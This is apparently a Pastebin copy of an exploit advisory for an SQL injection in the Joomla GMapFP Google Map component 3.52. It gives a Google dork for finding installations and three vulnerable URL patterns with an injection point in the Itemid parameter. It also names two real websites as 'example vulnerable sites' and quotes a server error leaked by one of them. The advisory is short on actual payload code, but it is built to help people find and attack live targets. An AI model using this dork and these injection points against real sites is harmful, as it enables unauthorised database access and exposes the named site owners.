KingSkrupellos

Joomla GMapFP Google Map Components 3.52 SQL Injection

Jan 31st, 2019
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.44 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla GMapFP Google Map Components 3.52 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/02/2019
  7. # Vendor Homepage : gmapfp.org
  8. # Software Download Link : gmapfp.org/en/download/func-startdown/37/lang,en-gb/
  9. # Software Information Link : extensions.joomla.org/extension/gmapfp-google-map/
  10. # Software Version : J3.52F
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_gmapfp''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ####################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. GMapFP is a more complete component for Google map.
  26.  
  27. All this versions are available with Joomla 3 on http and https.
  28.  
  29. You can use Google Maps very easily in your Joomla site.
  30.  
  31. This component is natively compatible with Joomla and is available French and English.
  32.  
  33. It's compatible with JoomFish, XMAP, JComments and Joomla search module.
  34.  
  35. GMapFP is translated in many languages.
  36.  
  37. ####################################################################
  38.  
  39. # Impact :
  40. ***********
  41. Joomla GMapFP Google Map 3.52 and other versions component for Joomla! is
  42.  
  43. prone to an SQL-injection vulnerability because it fails to sufficiently
  44.  
  45. sanitize user-supplied data before using it in an SQL query.
  46.  
  47. A successful exploit may allow an attacker to compromise the application, access
  48.  
  49. or modify data, or exploit latent vulnerabilities in the underlying database.
  50.  
  51. A remote attacker can send a specially crafted request to the vulnerable application
  52.  
  53. and execute arbitrary SQL commands in application`s database.
  54.  
  55. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  56.  
  57. An attacker can exploit this issue using a browser.
  58.  
  59. ####################################################################
  60.  
  61. # SQL Injection Exploit :
  62. **********************
  63. /index.php?option=com_gmapfp&view=gmapfplist&id_perso=0&Itemid=[SQL Injection]
  64.  
  65. /index.php?option=com_gmapfp&view=gmapfplist&id_perso=[ID-NUMBER]&Itemid=[SQL Injection]
  66.  
  67. /index.php?option=com_gmapfp&view=gmapfp&layout=categorie&catid=[ID-NUMBER]&id_perso=[ID-NUMBER]&Itemid=[SQL Injection]
  68.  
  69. ####################################################################
  70.  
  71. # Example Vulnerable Sites :
  72. *************************
  73.  
  74. [+] le-moulin-assens.ch/index.php?option=com_gmapfp&view=gmapfp&layout=categorie&catid=34&id_perso=0&Itemid=57%27
  75.  
  76. [+] webvl.no-ip.org/Alizes/index.php?option=com_gmapfp&view=gmapfp&id_perso=0&Itemid=172
  77.  
  78. ####################################################################
  79.  
  80. # Example SQL Database Error :
  81. ****************************
  82.  
  83. Warning: Creating default object from empty value in /var/www/vhosts
  84. /le-moulin-assens.ch/httpdocs/www/components/com_gmapfp
  85. /views/gmapfp/tmpl/categorie.php on line 80
  86.  
  87. ####################################################################
  88.  
  89. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  90.  
  91. ####################################################################
Add Comment
Please, Sign In to add comment